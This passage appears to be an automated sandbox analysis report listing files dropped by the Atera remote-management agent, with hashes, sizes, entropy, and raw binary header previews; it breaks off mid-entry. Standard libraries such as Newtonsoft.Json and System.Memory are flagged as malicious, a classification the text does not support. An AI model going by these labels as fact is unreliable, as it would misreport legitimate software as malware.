                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):302128
                                                                                                                                                                                                                                        Entropy (8bit):7.176568516700616
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:KZVw5mx115y505H0jIfJMSFk9X0jIfJMSFk9y:48wJMykwwJMyky
                                                                                                                                                                                                                                        MD5:C8F6A8A7DE9D011EE1A86791F41B68F9
                                                                                                                                                                                                                                        SHA1:819D2ED9538BA442D5379507C9290F3C02C798DB
                                                                                                                                                                                                                                        SHA-256:0D8E3BA40E08DFB62BE304540F7981A23DF29F0BE6685169DD8ABDAF0528B760
                                                                                                                                                                                                                                        SHA-512:4D7396BF765766C918A36E2AA114DAB2714F9AD4F67BF567ED9B023D9CA6334A94DE7CF6B6B01757151FB4F24BC25F8C25542D3D191878B09C91878675D34E20
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B............" ..0..l.............. ........... ....................................`.................................s...O....................t..0(.............8............................................ ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............r..............@..B........................H.......$W..Pu..........t...X...........................................V.(......}......}....*..,..{.(..........,..p .@..(................s....(....*.~.......~....(....~.......~....(....*..0..........~.....(.....{.....{...+..(......{.....{3.~.....3..{.....p3.s>...s....%.o ...%.o!...(6...*.{.....{3"r...p.{.....{.....r...p.("...(#...*...0..$.......s$....o%...(&...o'...((......&.....*.................0..6.......r...p.().....-.r...p..q...(*.....q.....(+......&...*.*..........//..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dll.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                                        Entropy (8bit):5.0141792226861375
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGzNFF7ap+5v5OXrRf/2//FicYo4xT:JduPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:8F6EB9E75E6A6F0C0D58FB697C10CEDF
                                                                                                                                                                                                                                        SHA1:6944935DFDC33E0C6DB26869BF25EDA85A2622D8
                                                                                                                                                                                                                                        SHA-256:E2B8677434501735FB0233ED0CC2FFEE5BF6FB4387C51DBCB2585A70E42E4F08
                                                                                                                                                                                                                                        SHA-512:A946252B2E3705EAE751A2672D4ADE1499ECEB28C48B4BE6150C4201EE20A7B9A4450C75E06B07F5DAA3528041A566931D988FBD0C2EA90240D61008895BA44A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030847171668023
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:O1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7si:hIzm6pOIgvr7n
                                                                                                                                                                                                                                        MD5:D6217A5E6F82915EBFF37849BD12269A
                                                                                                                                                                                                                                        SHA1:3A4419B9D44FA4C8768EA94894BAF6A0C59EB650
                                                                                                                                                                                                                                        SHA-256:E16953B3A27A723D52C3F339F544709ACB60119CD60D39529062A3ED213010DA
                                                                                                                                                                                                                                        SHA-512:4CAA0C4E6EDB6BB142EF250E2839A121D7B801D801A3F7581C2413B51884ED181AF720AC61BEAE55D0292AB1CB1C445BDC687E99B53CDB4510AD7AE03F33B0DA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ..............................o.....`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398896
                                                                                                                                                                                                                                        Entropy (8bit):6.134466395224396
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:OjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvn:O+e55LgIkTmyAAfTnMLvn
                                                                                                                                                                                                                                        MD5:EABC58594323584D1064CFB69C37014D
                                                                                                                                                                                                                                        SHA1:6ADB6F949D9B5367AEF31E43EDCDA2795DC5E1FF
                                                                                                                                                                                                                                        SHA-256:5F425AA23D8677C5D6EA108C0A355347B1284ACC21FA58E24EFEB0FE12E33243
                                                                                                                                                                                                                                        SHA-512:FF021B0F43DEDE6A631659812B416FB0EE9B8D9BDCBD385D3694C104196353B4F2B8F0230228C7E8E96F53EA8B431A5C2BDC8A3BC9DD887F32096495D449B273
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`......,i....`.................................v...O.... ..................0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960863921169204
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:xBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUs:xBjk38WuBcAbwoA/BkjSHXP36RMGN
                                                                                                                                                                                                                                        MD5:0BEC53BD867503DF5A269731FD3645ED
                                                                                                                                                                                                                                        SHA1:BF5CD7E2D0AC312CAE9D0E8EF8513EB071D7E8CD
                                                                                                                                                                                                                                        SHA-256:32D998A374835BB2DC8BE8DF44083BFCCFFC385F9CA3088C20DF724D80501E31
                                                                                                                                                                                                                                        SHA-512:3C36FAC30027D1C4135BA0012B0D2B3303BA7471B1E7D3B3FFC973BE73F32691CCC7F2CD8608FB3C972AAF9E06B57C7CC4F8FCFCC96CA7300C79B0C1D4DD2E22
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ......7Q....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):154672
                                                                                                                                                                                                                                        Entropy (8bit):5.991266233276983
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:r4wM6OoRu7qywKsqxhDuPr5xJMnOfMAw3TkHjt0QQNOWIkHUsz72otckZ:r4wZywKn/U5xEwKIk0WV
                                                                                                                                                                                                                                        MD5:944A860674FD5734BD6688AC8AAE9256
                                                                                                                                                                                                                                        SHA1:16B78323C16F5C334DC2D2D389A848BDA81D6A96
                                                                                                                                                                                                                                        SHA-256:B845A1EFA303017440CB3741C5A9B9433186DECBD040902A6BCB7D46C51714FB
                                                                                                                                                                                                                                        SHA-512:E16A3E9734EE2E3473839D2CAED1CF4DA72A3772E8CEF69A30BAF6016FB014EFC1A0237E54D2B5908E1A7744EDDE75ADEDEE060F65A8F1B13E7395424B87850E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.b..........." ..0..*..........6&... ...`....... ..............................h,....@..................................%..O....`...............4..0(...........%..T............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................&......H............D...................$........................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. R..0 )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o ....%..{.......%q.........-.&.+.......o ....(!...*..{....*"..}....*..(....*:.(......(....*"..(....*f.(....%-.&+.(b.....(....*..(....*"..(....*...0..%.........("...(#...($....#.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.671789886100643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:CrMdp9yXOfPfAxR5zwWvYW8avNyb8E9VF6IYinAM+oCA+sg:CrMcXP6gEpYinAMxCP
                                                                                                                                                                                                                                        MD5:20ED3D49A0829801EED1EDAE79544BE1
                                                                                                                                                                                                                                        SHA1:7E0C9D7B6A4D50C3F87A3F2D1062260451C5A5AD
                                                                                                                                                                                                                                        SHA-256:D95B0423D6370B015114984C2E523D7C471233D597D5CFCA29997CF0BE39EC5C
                                                                                                                                                                                                                                        SHA-512:6595B9F28A09C427864746D0FF89F8966485923885DBF333A0569B853B6E7F41E6B6C60CFDC1F5F464CEB6DCD8CF15E9E5C79AD375DB3864F845B92325A4FF56
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ...............................#....@..................................B..O....`..@...............0(...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):420400
                                                                                                                                                                                                                                        Entropy (8bit):6.109526877399236
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:85douWvsWkOfjL/MEd6/7vfA8SCW1nFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFA:8pjblhW1g
                                                                                                                                                                                                                                        MD5:E114DA79F67E8F6B2D486175BFD14AC4
                                                                                                                                                                                                                                        SHA1:13E58B927F07AAC7238819E624027616AE14775A
                                                                                                                                                                                                                                        SHA-256:3ADD177F8DB848879B1CB6700F8A302FCCCDB1CA3DB15B9FEF27E47A84288F26
                                                                                                                                                                                                                                        SHA-512:2C92AA968090BAE35DFB2A52A73EFB69F8846A924C43FA40F5560FB49FE55495E716C265D48E941823D22E1ED1AB8880DBA3A52D5F52CECF819E284941042C46
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....d.........." ..0..8...........T... ...`....... ....................................`..................................T..O....`..p............B..0(..........XS............................................... ............... ..H............text... 6... ...8.................. ..`.rsrc...p....`.......:..............@..@.reloc...............@..............@..B.................T......H........X..\V.................R......................................:.(;.....}....*..{....*:.(;.....}....*..{....*...0...........~<...}.....r...p}........(.....(.....(.....r)..p.(........(u.....~<...(=...,z.....s....}.......}.......}............{............%......(>....%...D....%...!....%...%.........%....%.........s....(B...*vra..p.(....,...}....*..}....*..{....*vr...p.(....,...}....*..}....*..{....*z.{....,......(>...o?...s@...z*.0..(........{....-..(......o....&....(j

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):142384
                                                                                                                                                                                                                                        Entropy (8bit):6.161296428539405
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:dUGrszKKLBFa9DvrJGeesIf3afNs2AldfIQT:MBFd3/aFs2S
                                                                                                                                                                                                                                        MD5:064C5858F16F91EF621898A23ED7C22D
                                                                                                                                                                                                                                        SHA1:D2B7DB43AB9861D5919F945F152B7A5862E1DD4E
                                                                                                                                                                                                                                        SHA-256:B82F9A7647B4003F847A0817FDCC7031AD34B328FDC1BACBCA6BF86978091BD7
                                                                                                                                                                                                                                        SHA-512:786584A4040B92F556DE5BABC72AD7A94BFCE871C3EA518C226D14D11A5658AC6FDADB550E57D196983DC7CBF13A5EDC942A18C0E9896A7FBD254CEDC05B1101
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......A.....@.................................X...O.... ..0...............0(...@...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):110128
                                                                                                                                                                                                                                        Entropy (8bit):5.512118293006196
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:PPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/i7Hx8:PWw0SUUKBM8aOUiiGw7qa9tK/im
                                                                                                                                                                                                                                        MD5:18194884A62938A90047E72CA9EA7B90
                                                                                                                                                                                                                                        SHA1:01DCF254262507C621B9CFFB6517925F89D268B5
                                                                                                                                                                                                                                        SHA-256:3C79FFB1D2BB625E0DD70D95E27F44CEAD5CCC2E0388ED19017D2621FD6DD5C8
                                                                                                                                                                                                                                        SHA-512:F5F2BA9C71C5927314B2C23A969DEC5E0D510EDF79E1D1589651602E721126DBCD93647FCA7CCF205F4AEA6CE1961E3271641B03054AACE14EDA614345DB0AC7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ..............................:.....@.................................f...O.......................0(.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.675580489635893
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeB3xV:zy9eEpYinAMxCA7
                                                                                                                                                                                                                                        MD5:41A5C0401DD6C187B2F6D48BA609593A
                                                                                                                                                                                                                                        SHA1:9898058AFE558B47F32EF3F9C8FE3929F971D572
                                                                                                                                                                                                                                        SHA-256:BEBAC40679E174EB69259875424627070460518C9A234B322DA44CEF3F60E956
                                                                                                                                                                                                                                        SHA-512:EAA66E86F36A2C32BC57CAF76AEB4F784E6E72FB2E6740FC38580785F4CF82435D404E6F4CF1D4062301521343CAA8D6E634203FCC0C0631FAE825ADBB0F3067
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19504
                                                                                                                                                                                                                                        Entropy (8bit):6.5231950705968025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:eryPa16oAL4D+wW9IWmDIW4IWYDcNyb8E9VF6IYinAM+oCFMx:4Ws6oqDjADKeD8EpYinAMxCS
                                                                                                                                                                                                                                        MD5:1953CC01CFE7AC5CCA7F3D3B8358DD14
                                                                                                                                                                                                                                        SHA1:5C1A31E2121096CEC0CC5AB4EE41CE4DD751688E
                                                                                                                                                                                                                                        SHA-256:B48815AFE4CDCB3795427A6C11DC2364B93B655B4AE4DB9B6C6B79FA7A473688
                                                                                                                                                                                                                                        SHA-512:148AED2DA26499FC3A5A98C829357FA0A99C40D18E035783409C529D4ED1F0E98865339DBA4A9EBE04CDAA6328953475156640CF8EE793110E16218D8BE79ED3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.............b2... ...@....... ....................................@..................................2..O....@...............$..0(...`......x1............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................B2......H........!..T....................0......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2r[..p.(....*B.....(.........*.BSJB............v4.0.30319......l...4...#~..........#Strings....t.......#US.@.......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):41520
                                                                                                                                                                                                                                        Entropy (8bit):6.410235756157491
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:xjfAw5tis37Mkvwtwq6uUQ/B0X5tl9wCVjkz3pVS3Upoztjl2Nyb8E9VF6IYinA2:xks374GX7nwOa5VS2ozdleEpYinAMxC4
                                                                                                                                                                                                                                        MD5:9B0D3892C30CB92562149E969895D9C8
                                                                                                                                                                                                                                        SHA1:B2AB853CFA3BEA350FFD9E3BB66DB914C304FD67
                                                                                                                                                                                                                                        SHA-256:B59FAC976FADEEC80074831FEE74BEBDFAF4BFDB0DE10D15923BAB1436DF3D9A
                                                                                                                                                                                                                                        SHA-512:6D35CB8BAEED39B825E524AE31D27C78F3D5A47C98BE42D2BE6FD3578D1ACA91D0EF2C73FB72569CB73BA3185599545BF082F6E3348FE256F5217E3AF88C3917
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0..n..........r.... ........@.. ..............................."....`................................. ...O....................z..0(.......................................................... ............... ..H............text...xm... ...n.................. ..`.rsrc................p..............@..@.reloc...............x..............@..B................T.......H........!...............1..@Z............................................(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....rY..p~....o....t....*.~....*..(....*Vs....(....t.........*.(.....(....(......,....s....o....*(....*.0..........(....o ...rm..p(!...(".....'...%.. .o#......i./..|s$......)...(.......(%....)...o&.......o'......i.0..+....o(......i.0..+....o)......i....+....o*...s+....o,.....,..(-.....&..*..................0..........(.... ....`(/.....&.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1547
                                                                                                                                                                                                                                        Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                        MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                        SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                        SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                        SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
